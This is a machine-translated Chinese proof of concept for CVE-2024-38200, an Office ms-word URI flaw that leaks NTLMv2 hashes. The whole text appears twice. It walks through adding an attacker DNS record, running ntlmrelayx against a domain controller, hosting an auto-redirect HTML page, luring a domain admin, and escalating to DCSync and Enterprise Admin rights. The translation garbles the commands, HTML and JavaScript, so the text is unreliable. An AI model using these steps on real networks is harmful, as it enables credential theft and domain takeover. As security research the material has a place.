#利用标题: Microsoft Office NTLMV2披露漏洞
#利用作者: Metin Yunus Kandemir
#供应商homepage: https://www.office.com/
#软件link: https://www.office.com/
#详细信息: https://github.com/passtheticket/cve-2024-38200
#版本: Microsoft Office 2019 MSO Build 1808(16.0.10411.20011),Microsoft 365 MSO(版本2403 Build 16.0.17425.20176)
#针对: Windows 11测试
#CVE: CVE-2024-38200
# 描述
MS Office URI计划允许从远程源获取文档。
MS URI方案格式为“ schemion-name :命令名称'|'命令- 题字'|'命令题目'。
example: ms-word
fe | u | http://hostname
ort/leak.docx
当URI'MS-WORD:OFE | U | http://HOSTNAMEORT/LEAK.DOCX'从受害者计算机调用。这种行为被滥用以捕获和中继NTLMV2哈希在SMB和HTTP上。有关在SMB上捕获受害者用户的NTLMV2 HASH的详细信息,您也可以访问3https://WWW.PRIVSEC.NZ/RELEASES/MS-OFFICE-URI HANDLERS。
#概念证明
如果我们添加DNS记录并在Office URI中使用此记录,Windows将将主机名视为Intranet区域的一部分。通过这种方式,NTLMV2身份验证会自动发生,标准用户可以升级特权而无需错误配置的GPO。任何具有标准特权的域用户都可以添加不存在的DNS记录,因此此攻击可与域用户的默认设置一起使用。
1。添加DNS记录以将主机名解析到运行NTLMRELAYX的攻击者IP地址。创建的记录开始解决大约需要5分钟。
$ python dnstool.py -u'unsafe.local \ testuser'-p'pass'-r'tacterhost' - action'add'add'add' - data [taintser -host -ip] [dc -ip] - zone unsafe.local
2。启动NTLMRELAYX,带有以下命令
$ python ntlmrelayx.py -t ldap: //dc-ip-address -escalate-user testuser -http-port 8080
3。使用Apache服务器使用HTML文件。用添加的记录替换主机名(例如AttackerHost)。
!doctype html
html lang='en'
头
meta charset='utf-8'
meta name='viewport'content='width=设备宽度,初始尺度=1.0'
titlememoftoft Office/Title
/头
身体
aid='link'href='ms-wordfe | u | http://hostnameort/leak.docx'/a
脚本
功能avavigationTolink(){
var link=document.getElementById('link');
如果(link){
var url=link.getAttribute('href');
window.location.href=url;
}
}
window.onload=navigateTolink;
/脚本
/身体
/html
4。将上述HTML文件的URL发送给具有域管理特权的用户。您应该在发送URL之前先检查DNS记录是否通过ping命令解决。当受害者用户导航到URL时,单击“打开”按钮足以捕获NTLMV2哈希。 (没有警告!)
5。用NTLMRELAYX将HTTP上捕获的NTLMV2 HASH传递到域控制器。结果,标准用户只需单击两次单击即可获得默认配置下的DCSync和Enterprise Admins权限。
#利用作者: Metin Yunus Kandemir
#供应商homepage: https://www.office.com/
#软件link: https://www.office.com/
#详细信息: https://github.com/passtheticket/cve-2024-38200
#版本: Microsoft Office 2019 MSO Build 1808(16.0.10411.20011),Microsoft 365 MSO(版本2403 Build 16.0.17425.20176)
#针对: Windows 11测试
#CVE: CVE-2024-38200
# 描述
MS Office URI计划允许从远程源获取文档。
MS URI方案格式为“ schemion-name :命令名称'|'命令- 题字'|'命令题目'。
example: ms-word
fe | u | http://hostnameort/leak.docx当URI'MS-WORD:OFE | U | http://HOSTNAME
ORT/LEAK.DOCX'从受害者计算机调用。这种行为被滥用以捕获和中继NTLMV2哈希在SMB和HTTP上。有关在SMB上捕获受害者用户的NTLMV2 HASH的详细信息,您也可以访问3https://WWW.PRIVSEC.NZ/RELEASES/MS-OFFICE-URI HANDLERS。#概念证明
如果我们添加DNS记录并在Office URI中使用此记录,Windows将将主机名视为Intranet区域的一部分。通过这种方式,NTLMV2身份验证会自动发生,标准用户可以升级特权而无需错误配置的GPO。任何具有标准特权的域用户都可以添加不存在的DNS记录,因此此攻击可与域用户的默认设置一起使用。
1。添加DNS记录以将主机名解析到运行NTLMRELAYX的攻击者IP地址。创建的记录开始解决大约需要5分钟。
$ python dnstool.py -u'unsafe.local \ testuser'-p'pass'-r'tacterhost' - action'add'add'add' - data [taintser -host -ip] [dc -ip] - zone unsafe.local
2。启动NTLMRELAYX,带有以下命令
$ python ntlmrelayx.py -t ldap: //dc-ip-address -escalate-user testuser -http-port 8080
3。使用Apache服务器使用HTML文件。用添加的记录替换主机名(例如AttackerHost)。
!doctype html
html lang='en'
头
meta charset='utf-8'
meta name='viewport'content='width=设备宽度,初始尺度=1.0'
titlememoftoft Office/Title
/头
身体
aid='link'href='ms-word
fe | u | http://hostnameort/leak.docx'/a脚本
功能avavigationTolink(){
var link=document.getElementById('link');
如果(link){
var url=link.getAttribute('href');
window.location.href=url;
}
}
window.onload=navigateTolink;
/脚本
/身体
/html
4。将上述HTML文件的URL发送给具有域管理特权的用户。您应该在发送URL之前先检查DNS记录是否通过ping命令解决。当受害者用户导航到URL时,单击“打开”按钮足以捕获NTLMV2哈希。 (没有警告!)
5。用NTLMRELAYX将HTTP上捕获的NTLMV2 HASH传递到域控制器。结果,标准用户只需单击两次单击即可获得默认配置下的DCSync和Enterprise Admins权限。
